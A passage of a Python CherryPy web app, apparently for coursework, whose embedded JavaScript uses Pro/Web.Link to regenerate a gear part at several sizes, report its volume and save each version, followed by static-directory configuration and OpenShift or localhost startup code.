//createParametersFromArguments ();
// 以下則直接利用 javascript 程式改變零件參數
for(i=0;i<=5;i++)
{
//for(j=0;j<=2;j++)
//{
myf=25+i*2;
myn=10.0+i*0.5;
// 設定變數值, 利用 ModelItem 中的 CreateDoubleParamValue 轉換成 Pro/Web.Link 所需要的浮點數值
//d1Value = pfcCreate ("MpfcModelItem").CreateDoubleParamValue(myf);
d1Value = pfcCreate ("MpfcModelItem").CreateIntParamValue(myf);
d2Value = pfcCreate ("MpfcModelItem").CreateDoubleParamValue(myn);
// 將處理好的變數值, 指定給對應的零件變數
length.Value = d1Value;
width.Value = d2Value;
//零件尺寸重新設定後, 呼叫 Regenerate 更新模型
solid.Regenerate(void null);
//利用 GetMassProperty 取得模型的質量相關物件
properties = solid.GetMassProperty(void null);
//volume = volume + properties.Volume;
volume = properties.Volume;
count = count + 1;
alert("執行第"+count+"次,零件總體積:"+volume);
// 將零件存為新檔案
var newfile = document.pwl.pwlMdlSaveAs("gear.prt", "v:/", "mygear_"+count+".prt");
if (!newfile.Status) {
alert("pwlMdlSaveAs failed (" + newfile.ErrorCode + ")");
}
//} // 內圈 for 迴圈
} //外圈 for 迴圈
//alert("共執行:"+count+"次,零件總體積:"+volume);
//alert("零件體積:"+properties.Volume);
//alert("零件體積取整數:"+Math.round(properties.Volume));
}
catch(err)
{
alert ("Exception occurred: "+pfcGetExceptionType (err));
}
// ]]></script>
        '''
        return outstring
    #@-others
#@-others
root = Gear()
# setup static, images and downloads directories
# Map the three URL prefixes onto on-disk static directories; /static lives
# next to the code, /images and /downloads under the writable data_dir.
application_conf = {
    '/static':{
        'tools.staticdir.on': True,
        'tools.staticdir.dir': _curdir+"/static"},
    '/images':{
        'tools.staticdir.on': True,
        'tools.staticdir.dir': data_dir+"/images"},
    '/downloads':{
        'tools.staticdir.on': True,
        'tools.staticdir.dir': data_dir+"/downloads"}
    }
# if inOpenshift ('OPENSHIFT_REPO_DIR' exists in environment variables) or not inOpenshift
# NOTE(review): 'application' is only bound inside the __main__ guard; a
# WSGI container that *imports* this module would never see it -- confirm
# the intended OpenShift entry point.
if __name__ == '__main__':
    if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
        # operate in OpenShift
        application = cherrypy.Application(root, config = application_conf)
    else:
        # operate in localhost
        cherrypy.quickstart(root, config = application_conf)
#@-leo
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.